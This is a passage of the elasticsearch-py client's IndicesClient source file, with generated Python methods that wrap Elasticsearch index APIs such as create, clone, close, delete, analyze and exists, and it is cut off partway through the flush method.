| 9c5fdd8222f30b36a47ec94849e5a963187ba1ac | 140,416 | py | Python | elasticsearch/_sync/client/indices.py | kholia/elasticsearch-py | 013433e5008277144065ad8e82f66870b203269a | ["Apache-2.0"] | 1 | 2022-01-05T03:43:43.000Z | 2022-01-05T03:43:43.000Z | elasticsearch/_sync/client/indices.py | kholia/elasticsearch-py | 013433e5008277144065ad8e82f66870b203269a | ["Apache-2.0"] | null | null | null | elasticsearch/_sync/client/indices.py | kholia/elasticsearch-py | 013433e5008277144065ad8e82f66870b203269a | ["Apache-2.0"] | null | null | null |
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict, List, Optional, Union
from elastic_transport import HeadApiResponse, ObjectApiResponse
from ._base import NamespacedClient
from .utils import SKIP_IN_PATH, _quote, _quote_query, _rewrite_parameters
class IndicesClient(NamespacedClient):
@_rewrite_parameters()
def add_block(
self,
*,
index: Any,
block: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Adds a block to an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/index-modules-blocks.html>`_
:param index: A comma separated list of indices to add a block to
:param block: The block to add (one of read, write, read_only or metadata)
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if block in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'block'")
__path = f"/{_quote(index)}/_block/{_quote(block)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("PUT", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def analyze(
self,
*,
index: Optional[Any] = None,
analyzer: Optional[str] = None,
attributes: Optional[List[str]] = None,
char_filter: Optional[List[Any]] = None,
error_trace: Optional[bool] = None,
explain: Optional[bool] = None,
field: Optional[Any] = None,
filter: Optional[List[Any]] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
normalizer: Optional[str] = None,
pretty: Optional[bool] = None,
text: Optional[Any] = None,
tokenizer: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
        Performs the analysis process on a text and returns the token breakdown
        of the text.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-analyze.html>`_
:param index: The name of the index to scope the operation
:param analyzer:
:param attributes:
:param char_filter:
:param explain:
:param field:
:param filter:
:param normalizer:
:param text:
:param tokenizer:
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_analyze"
else:
__path = "/_analyze"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if analyzer is not None:
__body["analyzer"] = analyzer
if attributes is not None:
__body["attributes"] = attributes
if char_filter is not None:
__body["char_filter"] = char_filter
if error_trace is not None:
__query["error_trace"] = error_trace
if explain is not None:
__body["explain"] = explain
if field is not None:
__body["field"] = field
if filter is not None:
__body["filter"] = filter
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if normalizer is not None:
__body["normalizer"] = normalizer
if pretty is not None:
__query["pretty"] = pretty
if text is not None:
__body["text"] = text
if tokenizer is not None:
__body["tokenizer"] = tokenizer
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("POST", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def clear_cache(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
fielddata: Optional[bool] = None,
fields: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
query: Optional[bool] = None,
request: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Clears all or specific caches for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clearcache.html>`_
:param index: A comma-separated list of index name to limit the operation
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param fielddata: Clear field data
:param fields: A comma-separated list of fields to clear when using the `fielddata`
parameter (default: all)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param query: Clear query caches
:param request: Clear request cache
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_cache/clear"
else:
__path = "/_cache/clear"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if fielddata is not None:
__query["fielddata"] = fielddata
if fields is not None:
__query["fields"] = fields
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if query is not None:
__query["query"] = query
if request is not None:
__query["request"] = request
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def clone(
self,
*,
index: Any,
target: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Dict[str, Any]] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
        Clones an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html>`_
:param index: The name of the source index to clone
:param target: The name of the target index to clone into
:param aliases:
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for on
the cloned index before the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if target in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'target'")
__path = f"/{_quote(index)}/_clone/{_quote(target)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def close(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Closes an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html>`_
:param index: A comma separated list of indices to close
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Sets the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_close"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters(
body_fields=True,
)
def create(
self,
*,
index: Any,
aliases: Optional[Dict[Any, Any]] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
mappings: Optional[Any] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
settings: Optional[Any] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Creates an index with optional settings and mappings.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index.html>`_
:param index: The name of the index
:param aliases:
:param mappings: Mapping for fields in the index. If specified, this mapping
can include: - Field names - Field data types - Mapping parameters
:param master_timeout: Specify timeout for connection to master
:param settings:
:param timeout: Explicit operation timeout
:param wait_for_active_shards: Set the number of active shards to wait for before
the operation returns.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__body: Dict[str, Any] = {}
__query: Dict[str, Any] = {}
if aliases is not None:
__body["aliases"] = aliases
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if mappings is not None:
__body["mappings"] = mappings
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if settings is not None:
__body["settings"] = settings
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if not __body:
__body = None # type: ignore[assignment]
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
if __body is not None:
__headers["content-type"] = "application/json"
return self._perform_request("PUT", __target, headers=__headers, body=__body) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def create_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
        Creates a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the data stream
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("PUT", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def data_streams_stats(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Provides statistics on operations happening in a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data stream names; use `_all` or empty
string to perform the operation on all data streams
:param expand_wildcards:
"""
if name not in SKIP_IN_PATH:
__path = f"/_data_stream/{_quote(name)}/_stats"
else:
__path = "/_data_stream/_stats"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an index.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-index.html>`_
:param index: A comma-separated list of indices to delete; use `_all` or `*`
string to delete all indices
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Whether wildcard expressions should get expanded to
open, closed, or hidden indices
:param ignore_unavailable: Ignore unavailable indexes (default: false)
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_alias(
self,
*,
index: Any,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names (supports wildcards); use
`_all` for all indices
:param name: A comma-separated list of aliases to delete (supports wildcards);
use `_all` to delete all aliases for the specified indices.
:param master_timeout: Specify timeout for connection to master
        :param timeout: Explicit operation timeout
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes a data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data streams to delete; use `*` to delete
all data streams
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_index_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def disk_usage(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flush: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
run_expensive_tasks: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[str] = None,
) -> ObjectApiResponse[Any]:
"""
        Analyzes the disk usage of each field of an index or data stream.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html>`_
:param index: Comma-separated list of data streams, indices, and aliases used
to limit the request. It’s recommended to execute this API with a single
index (or the latest backing index of a data stream) as the API consumes
resources significantly.
:param allow_no_indices: If false, the request returns an error if any wildcard
expression, index alias, or _all value targets only missing or closed indices.
This behavior applies even if the request targets other open indices. For
example, a request targeting foo*,bar* returns an error if an index starts
with foo but no index starts with bar.
:param expand_wildcards: Type of index that wildcard patterns can match. If the
request can target data streams, this argument determines whether wildcard
expressions match hidden data streams. Supports comma-separated values, such
as open,hidden.
:param flush: If true, the API performs a flush before analysis. If false, the
response may not include uncommitted data.
:param ignore_unavailable: If true, missing or closed indices are not included
in the response.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param run_expensive_tasks: Analyzing field disk usage is resource-intensive.
To use the API, this parameter must be set to true.
:param timeout: Period to wait for a response. If no response is received before
the timeout expires, the request fails and returns an error.
:param wait_for_active_shards: The number of shard copies that must be active
before proceeding with the operation. Set to all or any positive integer
up to the total number of shards in the index (number_of_replicas+1). Default:
1, the primary shard.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_disk_usage"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flush is not None:
__query["flush"] = flush
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if run_expensive_tasks is not None:
__query["run_expensive_tasks"] = run_expensive_tasks
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-exists.html>`_
:param index: A comma-separated list of index names
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Ignore unavailable indexes (default: false)
:param include_defaults: Whether to return all default setting for each of the
indices.
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_alias(
self,
*,
name: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular alias exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param name: A comma-separated list of alias names to return
:param index: A comma-separated list of index names to filter aliases
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
elif name not in SKIP_IN_PATH:
__path = f"/_alias/{_quote(name)}"
else:
raise ValueError("Couldn't find a path for the given parameters")
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_index_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Comma-separated list of index template names used to limit the request.
Wildcard (*) expressions are supported.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The comma separated names of the index templates
:param flat_settings: Return settings in flat format (default: false)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Explicit operation timeout for connection to master node
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def flush(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
force: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
wait_if_ongoing: Optional[bool] = None,
